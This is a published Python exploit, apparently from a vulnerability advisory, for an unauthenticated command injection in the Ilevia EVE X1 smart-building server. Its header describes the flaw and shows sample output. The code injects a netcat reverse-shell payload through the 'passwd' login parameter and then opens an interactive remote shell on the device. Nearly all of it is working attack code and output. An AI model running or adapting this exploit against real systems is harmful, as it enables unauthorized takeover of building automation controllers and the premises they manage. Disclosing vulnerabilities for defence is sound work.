Ilevia EVE X1 Server 4.7.18.0.eden Neuro-Core Unauth Code Invasion

Title: Ilevia EVE X1 Server 4.7.18.0.eden Neuro-Core Unauth Code Invasion Advisory ID: ZSL-2025-5956 Type: Local/Remote Impact: System Access,…

#!/usr/bin/env python
#
#
# Ilevia EVE X1 Server 4.7.18.0.eden Neuro-Core Unauth Code Invasion
#
#
# Vendor: Ilevia Srl.
# Product web page: https://www.ilevia.com
# Affected version: <= 4.7.18.0.eden (Logic ver: 6.00)
#
# Summary: EVE is a smart home and building automation solution designed
# for both residential and commercial environments, including malls, hotels,
# restaurants, bars, gyms, spas, boardrooms, and offices. It enables comprehensive
# control and monitoring of electrical installations through a highly customizable,
# user-friendly interface.
#
# EVE is a multi-protocol platform that integrates various systems within
# a smart building to enhance comfort, security, safety, and energy efficiency.
# Users can manage building functions via iPhone, iPad, Android devices, Windows
# PCs, or Mac computers.
#
# The EVE X1 Server is the dedicated hardware solution for advanced building
# automation needs. Compact and powerful, it is ideal for apartments, small
# to medium-sized homes, and smaller commercial installations. It is designed
# to manage entire automation systems reliably and efficiently.
#
# Desc: The EVE X1 server suffers from an unauthenticated OS command injection
# vulnerability. This can be exploited to inject and execute arbitrary shell
# commands through the ‘passwd’ HTTP POST parameter in /ajax/php/login.php script.
#
# ——————————————————————————
# $ python eve.py 10.0.0.17:8080 10.0.0.3 5555
# [+] Cyber-link active on 0.0.0.0:5555…
# [*] Firing at http://10.0.0.17:8080/ajax/php/login.php
# [+] Pulse from 10.0.0.17:40040
# [*] Probing matrix with ‘pwd’ signal…
# [+] Verifistring: /home/ilevia/www-config/http/ajax/php
# [*] Synaptic intrusion confirmed, escalating to holo-shell…
# [+] Holo-shell online. ‘exit’ to disengage.
# >> id
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
# >> uname -a
# Linux x1-eve 5.4.35-sunxi #trunk SMP Thu Apr 23 18:06:21 CEST 2020 armv7l GNU/Linux
# >> exit
# ——————————————————————————
#
# Tested on: GNU/Linux 5.4.35 (armv7l)
# GNU/Linux 4.19.97 (armv7l)
# Armbian 20.02.1 Buster
# Apache/2.4.38 (Debian)
# PHP Version 7.3.14
#
#
# Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2025-5956
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5956.php
#
#
# 01.05.2024
#

import socket, telnetlib, threading, time, requests, sys

def init_quantum(target_data):
if “http://” not in target_data and “https://” not in target_data:
target_data = “http://” + target_data
if “:” not in target_data.split(“//”)[1]:
target_data = target_data.rstrip(“/”) + “:80”
return target_data.rstrip(“/”)

def spark_neuroport(cyber_gate):
def neuro_core():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((“0.0.0.0”, cyber_gate))
s.listen(1)
print(f”[+] Cyber-link active on 0.0.0.0:{cyber_gate}…”)
conn, addr = s.accept()
print(f”[+] Pulse from {addr[0]}:{addr[1]}”)
holo_term = telnetlib.Telnet()
holo_term.sock = conn

print(“[*] Probing matrix with ‘pwd’ signal…”)
conn.sendall(b”pwd\n”)
time.sleep(0.5)
try:
data_stream = conn.recv(4096).decode(errors=’ignore’)
data_nodes = data_stream.splitlines()
if data_nodes and data_nodes[0].strip() == “pwd”:
data_nodes.pop(0)
output = “\n”.join(data_nodes).strip()
print(“[+] Verifistring:”, output)
if ‘ilevia/www-config’ in output:
print(“[*] Synaptic intrusion confirmed, escalating to holo-shell…”)
conn.sendall(b”script /dev/null -c /bin/sh\n”)
time.sleep(0.5)
try:
_ = conn.recv(4096)
except:
pass
else:
print(“[!] Expected neural path not detected. Holo-shell may be unstable.”)
except Exception as e:
print(f”[!] Error in synaptic probe: {e}”)

print(“””
_…._
.’ ‘.
/ __ \\
| .’ \ /
\ | /.’
\ |
‘.\ _
\_><_\\
| `-._ _…__
| -““ “”-,
|, _. )
/ /“”‘—“`|-‘
/ | .-‘ ‘-;
| \ 6_) 6_)\\
\ ‘. ) \\ BZZT! Once you blast that holo-shell wide open on the EVE X1 grid,
‘. ,—‘ _.–.` / you’re cruisin’ the neon datastreams, baby!
‘-.._\- `””`.’ Judy Jetson, your cosmic code-slinger, zappin’ through the quantum void!
`’-. .–‘ PEW PEW!
.=========| |=========,
‘. | | .’
`-._ `-._| .-‘
`-._ `_.-‘
‘-.-‘
“””)
print(“[+] Holo-shell online. ‘exit’ to disengage.”)
while True:
try:
cmd = input(“>> “).strip()
if cmd == “exit”:
break
if not cmd:
continue
conn.sendall((cmd + “\n”).encode())
time.sleep(0.3)
data_stream = conn.recv(7777).decode(errors=’ignore’)
data_nodes = data_stream.splitlines()
if data_nodes and data_nodes[0].strip() == cmd:
data_nodes.pop(0)
if data_nodes and data_nodes[-1].strip() in [“$”, “#”]:
data_nodes.pop(-1)
print(“\n”.join(data_nodes).strip())
except Exception:
print(“[!] Neural link terminated.”)
break
conn.close()
cyber_thread = threading.Thread(target=neuro_core)
cyber_thread.start()
return cyber_thread

def fire_photon(target_matrix, cyber_origin, cyber_gate):
print(f”[*] Firing at {target_matrix}”)
payload = f”;mknod /tmp/pipe p; /bin/sh -i < /tmp/pipe | nc {cyber_origin} {cyber_gate} > /tmp/pipe”
try:
requests.post(target_matrix, data={“userid”:”george”,”passwd”:payload}, timeout=3)
print(“[*] Photon fired.”)
except requests.exceptions.ReadTimeout:
pass # Expected when cyber-link engages
except requests.exceptions.RequestException as e:
print(f”[!] Photon failed: {e}”)

def boot_sequence():
if len(sys.argv) != 4:
print(f”Usage: {sys.argv[0]} “)
print(“Example: python eve.py 1.2.3.4:8080 5.6.7.8 5555”)
sys.exit(1)

target_data = sys.argv[1]
cyber_origin = sys.argv[2]
try:
cyber_gate = int(sys.argv[3])
except ValueError:
print(“[!] Cyber gate must be numeric.”)
sys.exit(1)

target_matrix = init_quantum(target_data) + “/ajax/php/login.php”

neuro_thread = spark_neuroport(cyber_gate)
time.sleep(1)
fire_photon(target_matrix, cyber_origin, cyber_gate)
neuro_thread.join()

if __name__ == “__main__”:
boot_sequence()